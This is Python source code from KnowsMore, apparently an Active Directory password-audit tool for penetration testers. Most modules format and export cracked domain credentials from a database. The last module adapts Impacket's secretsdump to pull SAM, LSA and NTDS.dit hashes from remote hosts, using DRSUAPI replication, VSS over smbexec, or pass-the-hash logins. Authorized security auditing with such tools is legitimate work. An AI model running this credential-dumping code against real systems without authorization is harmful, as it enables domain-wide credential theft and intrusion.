#!/usr/bin/python3
# -*- coding: UTF-8 -*-
import base64
import datetime
import os
import string, random, sys, re
import unicodedata
from ansi2image.ansi2image import Ansi2Image
from tabulate import _table_formats, tabulate, TableFormat, Line, DataRow

from knowsmore.util.color import Color

_texts = {
    'qty': 'Quantity',
    'company_similarity': 'Company Similarity'
}

class Tools:

    def __init__(self):
        pass

    @staticmethod
    def random_generator(size=6, chars=string.ascii_uppercase + string.digits):
        return ''.join(random.choice(chars) for x in range(size))

    @staticmethod
    def clear_line():
        sys.stderr.write("\033[K")
        sys.stdout.write("\033[K")  # Clear to the end of line

        try:
            size = os.get_terminal_size(fd=os.STDOUT_FILENO)
        except:
            size = 50

        print((" " * size), end='\r', flush=True)
        print((" " * size), file=sys.stderr, end='\r', flush=True)

    @staticmethod
    def permited_char_filename(s):
        if s.isalpha():
            return True
        elif bool(re.match("^[A-Za-z0-9]*$", s)):
            return True
        elif s == "-":
            return True
        elif s == "_":
            return True
        elif s == ".":
            return True
        else:
            return False

    @staticmethod
    def sanitize_filename(name):
        if name is None:
          return ''
        name = Tools.strip_accents(name.strip())
        while ('  ' in name):
            name = name.replace('  ', ' ')
        name = name.replace(' ', '-')
        while ('--' in name):
            name = name.replace('--', '-')
        return ''.join(filter(Tools.permited_char_filename, name))

    @staticmethod     
    def permited_char(s):
        if s.isalpha():
            return True
        elif bool(re.match("^[A-Za-z0-9:]*$", s)):
            return True
        elif s == ".":
            return True
        elif s == ",":
            return True
        else:
            return False

    @staticmethod
    def mandatory():
        Color.pl('{!} {R}error: missing a mandatory option, use -h help{W}\r\n')
        Tools.exit_gracefully(1)

    @staticmethod
    def exit_gracefully(code=0):
        exit(code)

    @staticmethod
    def count_file_lines(filename: str):
        def _count_generator(reader):
            b = reader(1024 * 1024)
            while b:
                yield b
                b = reader(1024 * 1024)

        with open(filename, 'rb') as fp:
            c_generator = _count_generator(fp.raw.read)
            # count each \n
            count = sum(buffer.count(b'\n') for buffer in c_generator)
            return count + 1

    @staticmethod
    def clear_string(text):
        return ''.join(filter(Tools.permited_char, Tools.strip_accents(text))).strip().lower()

    @staticmethod
    def strip_accents(text):
        try:
            text = unicode(text, 'utf-8')
        except NameError:  # unicode is a default on python 3
            pass

        text = unicodedata.normalize('NFD', text) \
            .encode('ascii', 'ignore').decode("utf-8")

        return str(text).strip()

    @staticmethod
    def get_tabulated(data: list, labels: dict = None) -> str:

        if len(data) == 0:
            return ''

        i_labels = dict(
            password="Password",
            qty="Quantity",
            score="Score",
            company_similarity="Company Similarity",
            users="Users",
            machines="Machines",
            description="Description",
            group_name="Group",
            name="Username",
            right="Right"
        )

        if labels is not None or isinstance(labels, dict):
            i_labels = {**i_labels, **labels}

        headers = [
            (next(iter([
                v
                for k, v in i_labels.items()
                if h.lower() == str(k).lower()
            ]), h) if len(h) > 2 and h[0:2] != '__' else ' ')
            for h in data[0].keys()
        ]
        data = [item.values() for item in data]

        return tabulate(data, headers, tablefmt='psql')

    @staticmethod
    def get_ansi_tabulated(data: list) -> str:

        if len(data) == 0:
            return ''

        _table_formats["ccat"] = TableFormat(
            lineabove=None,
            linebelowheader=Line("", Color.s("{GR}─{W}"), Color.s("{GR}┼{W}"), ""),
            linebetweenrows=None,
            linebelow=None,
            headerrow=DataRow("", Color.s("{GR}│{W}"), ""),
            datarow=DataRow(Color.s("{W}{O}{D}"), Color.s("{W}{GR}│{W}"), ""),
            padding=1,
            with_header_hide=None,
        )

        headers = [(Tools.format_text_header(h) if len(h) > 2 and h[0:2] != '__' else ' ') for h in data[0].keys()]
        data = [item.values() for item in data]

        tmp_data = tabulate(data, headers, tablefmt='ccat')

        return tmp_data

    @staticmethod
    def format_text_header(text) -> str:
        if text in _texts.keys():
            return _texts[text]

        return text.capitalize()

    @staticmethod
    def sizeof_fmt(num, suffix="B", start_unit=""):
        started = False
        for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
            if started or start_unit.upper() == unit:
                started = True
                if abs(num) < 1024.0:
                    return f"{num:3.1f} {unit}{suffix}"
                num /= 1024.0
        return f"{num:.1f} Y{suffix}"

    @staticmethod
    def get_dict_value(data: dict, key: str, default=None):
        if data is None:
            return default

        #if not isinstance(data, dict):
        #    return

        # Return if matches
        if key in data:
            return data.get(key, default)

        # Try to locate with the key in lowercase
        return next(
            iter([
                v for k, v in data.items()
                if k.strip().lower() == key
            ]), default)

    @staticmethod
    def json_serial(obj):
        """JSON serializer for objects not serializable by default json code"""

        if isinstance(obj, (datetime.datetime, datetime.date)):
            return obj.strftime("%Y-%m-%dT%H:%M:%S.000Z")

        if isinstance(obj, bytes):
            return base64.b64encode(obj).decode("UTF-8")

        raise TypeError("Type %s not serializable" % type(obj))

    @staticmethod
    def escape_ansi(text):
        if text is None:
            return ''

        pattern = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -/]*[@-~]')
        return pattern.sub('', text)



import json
import os
import sqlite3
import time
from argparse import _ArgumentGroup, Namespace
from pathlib import Path

from ansi2image.ansi2image import Ansi2Image
from binascii import hexlify
from enum import Enum

from knowsmore.util.tools import Tools

from knowsmore.cmdbase import CmdBase
from knowsmore.password import Password
from knowsmore.util.color import Color
from knowsmore.util.database import Database
from knowsmore.util.knowsmoredb import KnowsMoreDB
from knowsmore.util.logger import Logger


class Credentials(CmdBase):
    db = None
    out_file = None
    out_path = None
    out_file_json = None

    def __init__(self):
        super().__init__('credentials', 'Show cracked credentials')

    def add_flags(self, flags: _ArgumentGroup):
        flags.add_argument('--save-to',
                           action='store',
                           default='',
                           dest=f'out_file',
                           help=Color.s(
                               'Output file to save TXT file'))

        flags.add_argument('--save-to-json',
                           action='store',
                           default='',
                           dest=f'out_file_json',
                           help=Color.s(
                               'Output file to save JSON data'))

        flags.add_argument('--save-to-img',
                           action='store',
                           default='',
                           dest=f'out_path',
                           help=Color.s(
                               'Output path to save PNG files'))

    def add_commands(self, cmds: _ArgumentGroup):
        pass

    def load_from_arguments(self, args: Namespace) -> bool:

        if args.out_file is not None and args.out_file.strip() != '':
            self.out_file = Path(args.out_file).absolute()

        if self.out_file is not None:
            if os.path.exists(self.out_file):
                Logger.pl('{!} {R}error: out file ({O}%s{R}) already exists {W}\r\n' % (
                    self.out_file))
                exit(1)

        if args.out_file_json is not None and args.out_file_json.strip() != '':
            self.out_file_json = Path(args.out_file_json).absolute()

        if self.out_file is not None:
            if os.path.exists(self.out_file):
                Logger.pl('{!} {R}error: out file ({O}%s{R}) already exists {W}\r\n' % (
                    self.out_file))
                exit(1)

        if args.out_path is not None and args.out_path.strip() != '':
            self.out_path = Path(args.out_path).absolute()

        if self.out_path is not None:
            if not os.path.isdir(self.out_path):
                Logger.pl('{!} {R}error: output path ({O}%s{R}) does not exists {W}\r\n' % (
                    self.out_path))
                exit(1)

        self.db = self.open_db(args)

        return True

    def run(self):

        data = []

        domains = self.db.select('domains')
        for r in domains:

            # Domain
            rows = self.db.select_raw(
                sql='select row_number() OVER (ORDER BY c.name) AS __line, c.name, p.password '
                    'from credentials as c '
                    'inner join passwords as p '
                    'on c.password_id = p.password_id ' 
                    'where p.password <> "" and c.domain_id = ? '
                    'order by c.name ',
                args=[r['domain_id']]
            )

            if len(rows) > 0:
                data.append({
                    'type': 'credentials',
                    'domain': r['name'],
                    'description': 'Cracked credentials for %s' % r['name'],
                    'rows': rows
                })

        if self.out_file_json is not None:
            Color.pl('{?} {W}{D}Credentials saved at {W}{C}%s{W}{D}{W}' % self.out_file_json)

            with open(self.out_file_json, "a", encoding="UTF-8") as text_file:
                text_file.write(json.dumps(
                    {
                        'data': data,
                        'meta': {
                            'type': 'stats',
                            'count': len(data),
                            'version': 1
                        }
                    }
                ))

        elif self.out_path is not None or self.out_file is not None:

            for i, d in enumerate(data):
                name = f"{i:03}_{Tools.sanitize_filename(d['description'])}"
                file_data = ' \033[38;5;52m=\033[38;5;88m=\033[38;5;124m=\033[38;5;160m=\033[38;5;196m> ' + Color.s(
                    '{W}{G}%s{W}\n' % d['description'])

                file_data += ''.join([
                    '%s─' % c for k, c in sorted(Color.gray_scale.items(), key=lambda x: x[0], reverse=True)
                ]) + Color.s('{W}\n')

                Color.pl('{?} {W}{D}Saving %s...{W}' % d['description'])

                if len(data) == 0:
                    file_data += Color.s(
                        '\n  {R}ATTENTION!!!{O} \n  %s{W}\n' % 'Table is empty')
                else:
                    file_data += Tools.get_ansi_tabulated(d['rows'])

                if self.out_path is not None:
                    o = Ansi2Image(0, 0, font_name=Ansi2Image.get_default_font_name(), font_size=13)
                    o.loads(file_data)
                    o.min_margin = 10
                    o.max_margin = 30
                    o.calc_size(margin=0.01)
                    o.save_image(os.path.join(self.out_path, f'{name}.png'), format='PNG')

                if self.out_file is not None:
                    name = str(self.out_file).replace(Path(self.out_file).suffix, "").rstrip(". ")

                    with open(f'{name}.ansi.txt', 'ab+') as f:
                        f.write(file_data.encode('utf-8', 'ignore'))
                        f.write(b"\n\n")

                    with open(f'{name}.txt', 'ab+') as f:
                        f.write(f"{d['description']}\n".encode('utf-8', 'ignore'))
                        f.write(Tools.get_tabulated(d['rows']).encode('utf-8', 'ignore'))
                        f.write(b"\n\n")

        else:

            for d in data:
                Color.pl('{?} {W}{D}%s{W}' % d['description'])
                print(Tools.get_tabulated(d['rows']))
                print(' ')









#!/usr/bin/python3
# -*- coding: UTF-8 -*-

import sys
from ..util.color import Color

class Logger(object):
    ''' Helper object for easily printing colored text to the terminal. '''

    out_file = ''

    @staticmethod
    def pl(text):
        '''Prints text using colored format with trailing new line.'''
        Color.pl(text)

        if Logger.out_file != '':
            try:
                with open(Logger.out_file, "a") as text_file:
                    text_file.write(Color.sc(text) + '\n')
            except:
                pass

    @staticmethod
    def p(text):
        '''Prints text using colored format.'''
        Color.p(text)

        if Logger.out_file != '':
            try:
                with open(Logger.out_file, "a") as text_file:
                    text_file.write(Color.sc(text) + '\n')
            except:
                pass

    @staticmethod
    def pl_file(text):
        '''Prints text using colored format with trailing new line.'''

        if Logger.out_file != '':
            try:
                with open(Logger.out_file, "a") as text_file:
                    text_file.write(Color.sc(text) + '\n')
            except:
                Color.pl(text)
        else:
            Color.pl(text)




class NTDSUserAccount:
    domain = 'default'
    user_name = rid = lm_ash = nt_hash = pwd_last_set = status = clear_text = object_sid = ''
    history = -1

    def __init__(self, domain, user_name, rid, lm_ash, nt_hash, pwd_last_set,
                 status: str = '',
                 clear_text: str = '',
                 history: int = -1,
                 full_name: str = '',
                 object_sid: str = ''):
        self.domain = domain
        self.user_name = user_name
        self.rid = rid
        self.lm_ash = lm_ash
        self.nt_hash = nt_hash
        self.pwd_last_set = pwd_last_set
        self.status = status
        self.clear_text = clear_text
        self.history = history
        self.full_name = full_name
        self.object_sid = object_sid

        if (self.domain is None or self.domain == '') and '\\' in self.user_name:
            f1s = self.user_name.strip().split('\\')
            self.domain = f1s[0].strip()
            self.user_name = f1s[1].strip()






import json

from datetime import datetime, timezone, timedelta
from knowsmore.password import Password

from knowsmore.util.knowsmoredb import KnowsMoreDB


class ExporterBase(KnowsMoreDB):

    def __init__(self, auto_create=True, db_name=None):
        super().__init__(
            auto_create=auto_create,
            db_name=db_name
        )

    def get_data_len(self, cracked_only=False) -> int:
        sql = (
            'select count(c.credential_id) as qty '
            'from credentials as c '
            'inner join passwords as p '
            'on c.password_id = p.password_id '
            'inner join domains as d '
            'on c.domain_id = d.domain_id '
        )

        if cracked_only:
            sql += ' where (p.length > 0) '

        return int(self.select_raw(
            sql=sql,
            args=[]
        )[0]['qty'])

    def get_data(self, export_password=False, cracked_only=False) -> list:
        sql = (
            'select c.credential_id, c.name, c.type, c.object_identifier, c.dn, c.user_data_similarity, c.insert_date, d.domain_id, d.name as domain_name, d.object_identifier as domain_object_identifier, '
            'd.dn as domain_dn, p.* '
            'from credentials as c '
            'inner join passwords as p '
            'on c.password_id = p.password_id '
            'inner join domains as d '
            'on c.domain_id = d.domain_id '
        )

        if cracked_only:
            sql += ' where (p.length > 0) '

        rows = self.select_raw(
            sql=sql,
            args=[]
        )
        for r in rows:
            p = r.get('password', '')
            if '$HEX[' in p:
                p1 = Password('', p)
                r['password'] = p1.latin_clear_text

            dt = datetime.strptime(str( r['insert_date']), '%Y-%m-%d %H:%M:%S')
            dt.astimezone(timezone(timedelta(hours=0), 'Z'))

            properties = dict(
                    name=r['name'],
                    distinguishedname=r['dn'],
                    object_identifier=r['object_identifier'],
                    type='Machine' if r['type'] == "M" else "User"
                )

            pwd = dict(
                cracked=bool(int(r['length']) > 0),
                length=r['length'],
                entropy=r['entropy'],
                upper=r['upper'],
                lower=r['lower'],
                digit=r['digit'],
                special=r['special'],
                latin=r['latin'],
                company_similarity=r['company_similarity'],
                user_data_similarity=r['user_data_similarity']
            )

            if export_password:
                pwd['password'] = r['password'],
                pwd['md5_hash'] = r['md5_hash'],
                pwd['sha1_hash'] = r['sha1_hash'],
                pwd['sha256_hash'] = r['sha256_hash'],
                pwd['sha512_hash'] = r['sha512_hash']

            bh = []
            if r['object_identifier'] is not None and r['object_identifier'].strip() != '':
                bh_objects = self.db.select(
                    'bloodhound_objects',
                    object_id=r['object_identifier']
                )
                for bho in bh_objects:
                    props = {}
                    try:
                        props = json.loads(bho['props'])
                    except:
                        pass

                    try:
                        dt = props.get('whencreated', dt)
                        properties['enabled'] = props.get('enabled', None)
                        properties['lastlogon'] = props.get('lastlogon', None)
                        properties['lastlogontimestamp'] = props.get('lastlogontimestamp', None)
                        properties['pwdlastset'] = props.get('pwdlastset', None)
                        properties['displayname'] = props.get('displayname', None)
                    except:
                        pass

                    bh.append(
                        dict(
                            object_id=bho['object_id'],
                            object_label=bho['object_label'],
                            filter_type=bho['filter_type'],
                            props=props,
                        )
                    )

            yield dict(
                created_at=int(dt.strftime("%s")),
                created_at_iso=dt.strftime("%Y-%m-%dT%H:%M:%S%Z"),
                object_id=r['credential_id'],
                password=pwd,
                properties=properties,
                domain=dict(
                    name=r['domain_name'],
                    distinguishedname=r['domain_dn'],
                    domainsid=r['domain_object_identifier'],
                ),
                bloodhound=bh
            )




import json
import os
import sqlite3
import time
from argparse import _ArgumentGroup, Namespace
from pathlib import Path
from binascii import hexlify
from enum import Enum

from knowsmore.util.tools import Tools

from knowsmore.cmdbase import CmdBase
from knowsmore.password import Password
from knowsmore.util.color import Color
from knowsmore.util.database import Database
from knowsmore.util.knowsmoredb import KnowsMoreDB
from knowsmore.util.logger import Logger


class Find(CmdBase):
    db = None
    find_text = ''
    out_file = None
    cracked_only = False
    json_format = False

    def __init__(self):
        super().__init__('member-of', 'Find all member of group at database')

    def add_flags(self, flags: _ArgumentGroup):
        flags.add_argument('-o', '--save-to',
                           action='store',
                           default='',
                           dest=f'out_file',
                           help=Color.s(
                               'Output file to save JSON data'))

        flags.add_argument('--cracked-only',
                           action='store_true',
                           default=False,
                           dest=f'cracked_only',
                           help=Color.s('Find cracked data only'))

        flags.add_argument('--json',
                           action='store_true',
                           default=False,
                           dest=f'json_format',
                           help=Color.s('Output in JSON format instead of text table'))

    def add_commands(self, cmds: _ArgumentGroup):
        cmds.add_argument('--name',
                          action='store',
                          metavar='[text]',
                          type=str,
                          dest=f'txt_find',
                          help=Color.s('Text to look for at all columns'))

    def load_from_arguments(self, args: Namespace) -> bool:
        if args.txt_find is not None and args.txt_find.strip() != '':
            self.find_text = args.txt_find

        if self.find_text is None or self.find_text.strip() == '':
            Logger.pl('{!} {R}error: text is invalid {O}%s{R} {W}\r\n' % (
                self.find_text))
            exit(1)

        if args.out_file is not None and args.out_file.strip() != '':
            self.out_file = Path(args.out_file).absolute()

        if self.out_file is not None:
            if os.path.exists(self.out_file):
                Logger.pl('{!} {R}error: out file ({O}%s{R}) already exists {W}\r\n' % (
                    self.out_file))
                exit(1)

        self.db = self.open_db(args)
        self.cracked_only = args.cracked_only
        self.json_format = args.json_format

        Logger.pl('     {C}find text:{O} %s{W}' % self.find_text)
        Logger.pl('     {C}cracked only:{O} %s{W}' % self.cracked_only)

        return True

    def run(self):

        sql = (
            'select row_number() OVER (ORDER BY g2.name, c.name) AS __line, g2.name group_name, '
            'c.name, p.password, be.edge_type as "right", '
            'case when c.enabled == 1 then "Yes" ELSE "No" end user_enabled '
            'from credentials as c '
            'inner join passwords as p  '
            'on c.password_id = p.password_id  '
            'inner join bloodhound_edge be  '
            'on be.source_id == c.object_identifier  '
            'and be.target_label == "Group" '
            'and be.edge_type in ("MemberOf", "Owns") '
            'inner join groups g2  '
            'on be.destination_id == g2.object_identifier  '
            'where g2.name like ? '
        )

        args = [f'%{self.find_text}%']

        if self.cracked_only:
            sql += ' and (p.password <> "") '

        sql += ' order by g2.name, c.enabled DESC, c.name'

        # Look for users
        rows = self.db.select_raw(
            sql=sql,
            args=args
        )

        if len(rows) == 0:
            Logger.pl('{!} {O}Nothing found with this text{W}\r\n')
            exit(0)

        news = {}
        for r in rows:
            p = r.get('password', '')
            if '$HEX[' in p:
                p1 = Password('', p)
                r['password'] = p1.latin_clear_text

        p_data = Tools.get_tabulated(rows, dict(
                group_name="Group",
                name="Username",
                password="Password",
                right="Right",
                user_enabled="User Enabled?"
            ))

        if self.json_format:
            p_data = json.dumps(
                {
                    'data': rows,
                    'meta': {
                        'type': 'credentials',
                        'count': len(rows),
                        'version': 1
                    }
                }
            )

        if self.out_file is not None:
            with open(self.out_file, "a", encoding="UTF-8") as text_file:
                text_file.write(p_data)
        else:
            print(p_data)

        if not self.cracked_only:
            Logger.pl('{!} {O}You can filter cracked only users using {C}--cracked-only{O} paramater{W}\r\n')

        Logger.pl('{+} {O}%s{W}{C} register found{W}' % len(rows))




# KnowsMore secretsdump.py module
#
# This module was adapted from secretsdump.py developed by Fortra
# https://github.com/fortra/impacket/blob/master/examples/secretsdump.py
#
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright (C) 2022 Fortra. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
#   Performs various techniques to dump hashes from the
#   remote machine without executing any agent there.
#   For SAM and LSA Secrets (including cached creds)
#   we try to read as much as we can from the registry
#   and then we save the hives in the target system
#   (%SYSTEMROOT%\\Temp dir) and read the rest of the
#   data from there.
#   For NTDS.dit we either:
#       a. Get the domain users list and get its hashes
#          and Kerberos keys using [MS-DRDS] DRSGetNCChanges()
#          call, replicating just the attributes we need.
#       b. Extract NTDS.dit via vssadmin executed  with the
#          smbexec approach.
#          It's copied on the temp dir and parsed remotely.
#
#   The script initiates the services required for its working
#   if they are not available (e.g. Remote Registry, even if it is
#   disabled). After the work is done, things are restored to the
#   original state.
#
# Author from original secretsdump.py:
#   Alberto Solino (@agsolino)
#
# References from original secretsdump.py:
#   Most of the work done by these guys. I just put all
#   the pieces together, plus some extra magic.
#
#   - https://github.com/gentilkiwi/kekeo/tree/master/dcsync
#   - https://moyix.blogspot.com.ar/2008/02/syskey-and-sam.html
#   - https://moyix.blogspot.com.ar/2008/02/decrypting-lsa-secrets.html
#   - https://moyix.blogspot.com.ar/2008/02/cached-domain-credentials.html
#   - https://web.archive.org/web/20130901115208/www.quarkslab.com/en-blog+read+13
#   - https://code.google.com/p/creddump/
#   - https://lab.mediaservice.net/code/cachedump.rb
#   - https://insecurety.net/?p=768
#   - https://web.archive.org/web/20190717124313/http://www.beginningtoseethelight.org/ntsecurity/index.htm
#   - https://www.exploit-db.com/docs/english/18244-active-domain-offline-hash-dump-&-forensic-analysis.pdf
#   - https://www.passcape.com/index.php?section=blog&cmd=details&id=15
#


# Impacket
from __future__ import division
from __future__ import print_function
import argparse
import codecs
import datetime
import json
import logging
import os
import sys

from impacket import version
from impacket.examples import logger
from impacket.examples.utils import parse_target
from impacket.smbconnection import SMBConnection

from ..libs.ntdsuseraccount import NTDSUserAccount
from ..libs.secretsdump import LocalOperations, RemoteOperations, SAMHashes, LSASecrets, NTDSHashes, \
    KeyListSecrets
from impacket.krb5.keytab import Keytab

from knowsmore.util.knowsmoredb import KnowsMoreDB

try:
    input = raw_input
except NameError:
    pass


import errno
import os
import re
from argparse import _ArgumentGroup, Namespace
from enum import Enum
from clint.textui import progress

from knowsmore.cmdbase import CmdBase
from knowsmore.config import Configuration
from knowsmore.password import Password
from knowsmore.util.color import Color
from knowsmore.util.logger import Logger
from knowsmore.util.tools import Tools


class DumpSecrets:
    __db = None
    __secret_callback = None

    def __init__(self, remoteName, username='', password='', domain='', options=None, secret_callback=None):
        self.__secret_callback = secret_callback
        self.__useVSSMethod = options.use_vss
        self.__useKeyListMethod = options.use_keylist
        self.__remoteName = remoteName
        self.__remoteHost = options.target_ip
        self.__username = username
        self.__password = password
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__aesKey = options.aesKey
        self.__aesKeyRodc = options.rodcKey
        self.__smbConnection = None
        self.__remoteOps = None
        self.__SAMHashes = None
        self.__NTDSHashes = None
        self.__LSASecrets = None
        self.__KeyListSecrets = None
        self.__rodc = options.rodcNo
        self.__systemHive = options.system
        self.__bootkey = options.bootkey
        self.__securityHive = options.security
        self.__samHive = options.sam
        self.__ntdsFile = options.ntds
        self.__history = False
        self.__noLMHash = True
        self.__isRemote = True
        self.__outputFileName = None
        self.__doKerberos = options.k
        self.__justDC = options.just_dc
        self.__justDCNTLM = options.just_dc_ntlm
        self.__justUser = options.just_dc_user
        self.__pwdLastSet = True
        self.__printUserStatus = True
        self.__resumeFileName = options.resumefile
        self.__canProcessSAMLSA = True
        self.__kdcHost = options.dc_ip
        self.__options = options

        if options.hashes is not None:
            self.__lmhash, self.__nthash = options.hashes.split(':')

    def connect(self):
        self.__smbConnection = SMBConnection(self.__remoteName, self.__remoteHost)
        if self.__doKerberos:
            self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,
                                               self.__nthash, self.__aesKey, self.__kdcHost)
        else:
            self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)

    def dump(self):
        try:
            if self.__remoteName.upper() == 'LOCAL' and self.__username == '':
                self.__isRemote = False
                self.__useVSSMethod = True
                if self.__systemHive:
                    localOperations = LocalOperations(self.__systemHive)
                    bootKey = localOperations.getBootKey()
                    if self.__ntdsFile is not None:
                    # Let's grab target's configuration about LM Hashes storage
                        self.__noLMHash = localOperations.checkNoLMHashPolicy()
                else:
                    import binascii
                    bootKey = binascii.unhexlify(self.__bootkey)

            else:
                self.__isRemote = True
                bootKey = None
                try:
                    try:
                        self.connect()
                    except Exception as e:
                        if os.getenv('KRB5CCNAME') is not None and self.__doKerberos is True:
                            # SMBConnection failed. That might be because there was no way to log into the
                            # target system. We just have a last resort. Hope we have tickets cached and that they
                            # will work
                            logging.debug('SMBConnection didn\'t work, hoping Kerberos will help (%s)' % str(e))
                            pass
                        else:
                            raise

                    self.__remoteOps  = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost)
                    self.__remoteOps.setExecMethod(self.__options.exec_method)
                    if self.__justDC is False and self.__justDCNTLM is False and self.__useKeyListMethod is False or self.__useVSSMethod is True:
                        self.__remoteOps.enableRegistry()
                        bootKey = self.__remoteOps.getBootKey()
                        # Let's check whether target system stores LM Hashes
                        self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy()
                except Exception as e:
                    self.__canProcessSAMLSA = False
                    if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \
                        and self.__doKerberos is True:
                        # Giving some hints here when SPN target name validation is set to something different to Off
                        # This will prevent establishing SMB connections using TGS for SPNs different to cifs/
                        logging.error('Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user')
                    else:
                        logging.error('RemoteOperations failed: %s' % str(e))

            # If the KerberosKeyList method is enable we dump the secrets only via TGS-REQ
            if self.__useKeyListMethod is True:
                try:
                    self.__KeyListSecrets = KeyListSecrets(self.__domain, self.__remoteName, self.__rodc, self.__aesKeyRodc, self.__remoteOps)
                    self.__KeyListSecrets.dump()
                except Exception as e:
                    logging.error('Something went wrong with the Kerberos Key List approach.: %s' % str(e))
            else:
                # If RemoteOperations succeeded, then we can extract SAM and LSA
                if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:
                    try:
                        if self.__isRemote is True:
                            SAMFileName = self.__remoteOps.saveSAM()
                        else:
                            SAMFileName = self.__samHive

                        self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote = self.__isRemote)
                        self.__SAMHashes.dump()
                        if self.__outputFileName is not None:
                            self.__SAMHashes.export(self.__outputFileName)
                    except Exception as e:
                        logging.error('SAM hashes extraction failed: %s' % str(e))

                    try:
                        if self.__isRemote is True:
                            SECURITYFileName = self.__remoteOps.saveSECURITY()
                        else:
                            SECURITYFileName = self.__securityHive

                        self.__LSASecrets = LSASecrets(SECURITYFileName, bootKey, self.__remoteOps,
                                                       isRemote=self.__isRemote, history=self.__history)
                        self.__LSASecrets.dumpCachedHashes()
                        if self.__outputFileName is not None:
                            self.__LSASecrets.exportCached(self.__outputFileName)
                        self.__LSASecrets.dumpSecrets()
                        if self.__outputFileName is not None:
                            self.__LSASecrets.exportSecrets(self.__outputFileName)
                    except Exception as e:
                        if logging.getLogger().level == logging.DEBUG:
                            import traceback
                            traceback.print_exc()
                        logging.error('LSA hashes extraction failed: %s' % str(e))

                # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
                if self.__isRemote is True:
                    if self.__useVSSMethod and self.__remoteOps is not None and self.__remoteOps.getRRP() is not None:
                        NTDSFileName = self.__remoteOps.saveNTDS()
                    else:
                        NTDSFileName = None
                else:
                    NTDSFileName = self.__ntdsFile

                self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote=self.__isRemote, history=self.__history,
                                               noLMHash=self.__noLMHash, remoteOps=self.__remoteOps,
                                               useVSSMethod=self.__useVSSMethod, justNTLM=self.__justDCNTLM,
                                               pwdLastSet=self.__pwdLastSet, resumeSession=self.__resumeFileName,
                                               outputFileName=self.__outputFileName, justUser=self.__justUser,
                                               printUserStatus= self.__printUserStatus,
                                               perSecretCallback=self.__secret_callback)
                try:
                    self.__NTDSHashes.dump()
                except Exception as e:
                    if logging.getLogger().level == logging.DEBUG:
                        import traceback
                        traceback.print_exc()
                    if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
                        # We don't store the resume file if this error happened, since this error is related to lack
                        # of enough privileges to access DRSUAPI.
                        resumeFile = self.__NTDSHashes.getResumeSessionFile()
                        if resumeFile is not None:
                            os.unlink(resumeFile)
                    logging.error(e)
                    if self.__justUser and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >=0:
                        logging.info("You just got that error because there might be some duplicates of the same name. "
                                     "Try specifying the domain name for the user as well. It is important to specify it "
                                     "in the form of NetBIOS domain name/user (e.g. contoso/Administratror).")
                    elif self.__useVSSMethod is False:
                        logging.info('Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter')
                self.cleanup()
        except (Exception, KeyboardInterrupt) as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback
                traceback.print_exc()
            logging.error(e)
            if self.__NTDSHashes is not None:
                if isinstance(e, KeyboardInterrupt):
                    resumeFile = self.__NTDSHashes.getResumeSessionFile()
                    if resumeFile is not None:
                        while True:
                            answer = input("Delete resume session file? [y/N] ")
                            if answer.upper() == '':
                                answer = 'N'
                                break
                            elif answer.upper() == 'Y':
                                answer = 'Y'
                                break
                            elif answer.upper() == 'N':
                                answer = 'N'
                                break
                        if answer == 'Y':
                            os.unlink(resumeFile)
            try:
                self.cleanup()
            except:
                pass

    def cleanup(self):
        logging.info('Cleaning up... ')
        if self.__remoteOps:
            self.__remoteOps.finish()
        if self.__SAMHashes:
            self.__SAMHashes.finish()
        if self.__LSASecrets:
            self.__LSASecrets.finish()
        if self.__NTDSHashes:
            self.__NTDSHashes.finish()
        if self.__KeyListSecrets:
            self.__KeyListSecrets.finish()


class SecretsDump(CmdBase):
    db = None
    remoteName = username = password = domain = ''
    options = None
    ct_count = nt_count = 0
    domain_cache = {}

    def __init__(self):
        super().__init__('secrets-dump', 'Import NTLM hashes and users/machines using impacket lib')

    def add_flags(self, flags: _ArgumentGroup):
        pass

    def add_commands(self, cmds: _ArgumentGroup):

        cmds.add_argument('-target', action='store',
                          help='[[domain/]username[:password]@]<targetName or address> or LOCAL'
                               ' (if you want to parse local files)')
        #cmds.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
        #cmds.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
        cmds.add_argument('-system', action='store', help='SYSTEM hive to parse')
        cmds.add_argument('-bootkey', action='store', help='bootkey for SYSTEM hive')
        cmds.add_argument('-security', action='store', help='SECURITY hive to parse')
        cmds.add_argument('-sam', action='store', help='SAM hive to parse')
        cmds.add_argument('-ntds', action='store', help='NTDS.DIT file to parse')
        cmds.add_argument('-resumefile', action='store', help='resume file name to resume NTDS.DIT session dump (only '
                                                              'available to DRSUAPI approach). This file will also be used to keep updating the session\'s '
                                                              'state')
        #cmds.add_argument('-outputfile', action='store',
        #                  help='base output filename. Extensions will be added for sam, secrets, cached and ntds')
        cmds.add_argument('-use-vss', action='store_true', default=False,
                          help='Use the VSS method instead of default DRSUAPI')
        cmds.add_argument('-rodcNo', action='store', type=int,
                          help='Number of the RODC krbtgt account (only avaiable for Kerb-Key-List approach)')
        cmds.add_argument('-rodcKey', action='store',
                          help='AES key of the Read Only Domain Controller (only avaiable for Kerb-Key-List approach)')
        cmds.add_argument('-use-keylist', action='store_true', default=False,
                          help='Use the Kerb-Key-List method instead of default DRSUAPI')
        cmds.add_argument('-exec-method', choices=['smbexec', 'wmiexec', 'mmcexec'], nargs='?', default='smbexec',
                          help='Remote exec '
                               'method to use at target (only when using -use-vss). Default: smbexec')

